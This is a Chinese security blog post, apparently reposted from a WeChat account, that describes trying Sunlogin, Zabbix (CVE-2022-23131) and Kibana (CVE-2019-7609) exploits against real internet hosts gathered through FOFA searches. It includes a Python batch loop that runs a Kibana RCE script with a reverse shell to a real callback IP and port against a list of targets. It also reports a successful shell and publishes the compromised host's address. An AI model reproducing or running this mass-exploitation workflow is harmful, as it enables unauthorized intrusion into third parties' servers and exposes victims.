应用协议-Kibana+Zabbix+远控向日葵

admin 2024年4月5日13:05:56评论9 views字数 1062阅读3分32秒阅读模式

案例:CNVD-2022-10207:向日葵RCE

影响客户端版本:

  • 11.1.1

  • 10.3.0.27372

  • 11.0.0.33162

Windows 10中安装向日葵程序,并关闭系统防火墙

开启向日葵发现漏洞版本都已经淘汰了,已经无法利用,搜索解决方法让更新版本

应用协议-Kibana+Zabbix+远控向日葵

利用工具探测也一无所获

应用协议-Kibana+Zabbix+远控向日葵

fofa获取资产批量扫描也一个漏洞都没有

应用协议-Kibana+Zabbix+远控向日葵

案例演示:设备平台-Zabbix-CVE-2022-23131

影响版本

Zabbix Web 前端版本包括

  1. •5.4.8

  2. •5.0.18

  3. •4.0.36

  4. •6.0.0alpha1

漏洞复现

Fofa 语法

app="ZABBIX-监控系统" && body="saml"

根据语法获取到大量资产

经过5--6个目标的复现,发现漏洞已经无法利用,官方增加了新的验证

根据漏洞复现文章得出:绕过以下登录验证即可进入zabbix后台

应用协议-Kibana+Zabbix+远控向日葵

但是绕过此登录验证后并没有进入后台,而是跳转到了另一个账户验证。尝试复现多个目标都是如此

应用协议-Kibana+Zabbix+远控向日葵

官方应该增加了一个账户验证,只有在租户中的账户才能登录zabbix

浏览器搜索该漏洞,发现复现文章也截至在了2022年,2023年无此漏洞复现文章

案例演示:设备平台-Kibana-CVE-2019-7609

漏洞产生

攻击者利用漏洞可以通过Kibana后台中的Timelion组件中的JavaScript原型链污染攻击,向Kibana发起相关请求,从而接管所在服务器,在服务器上执行任意命令。

影响范围

Kibana < 6.6.1

Kibana < 5.6.15

fofa获取大量资产,使用脚本测试漏洞,但是脚本只能一次测试单个ip

应用协议-Kibana+Zabbix+远控向日葵

所以利用python编写一个批量脚本:

将大量ip保存到一个ips.txt文件

应用协议-Kibana+Zabbix+远控向日葵

pyrhon脚本内容:漏洞测试脚本每执行结束一条命令,就将命令中的ip替换接着执行

脚本:

import os

for ip in open("ips.txt"):

ip=ip.strip()

#print(ip)

cmdline='python CVE-2019-7609-kibana-rce.py -u %s -host 43.134.241.193 -port 5566 --shell'%ip

print(cmdline)

os.system(cmdline)

应用协议-Kibana+Zabbix+远控向日葵

python运行脚本,成功实现批量检测

应用协议-Kibana+Zabbix+远控向日葵

然而这个漏洞貌似也过时了,扫描几个小时也没有出现一个

出现几个也都是误报,无法反弹shell

应用协议-Kibana+Zabbix+远控向日葵

经过一晚上检测之后终于成功反弹shell

应用协议-Kibana+Zabbix+远控向日葵

漏洞地址:http://1.116.90.210:5601

原文始发于微信公众号(小黑子安全):应用协议-Kibana+Zabbix+远控向日葵

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月5日13:05:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   应用协议-Kibana+Zabbix+远控向日葵https://cn-sec.com/archives/2632710.html

发表评论

匿名网友 填写信息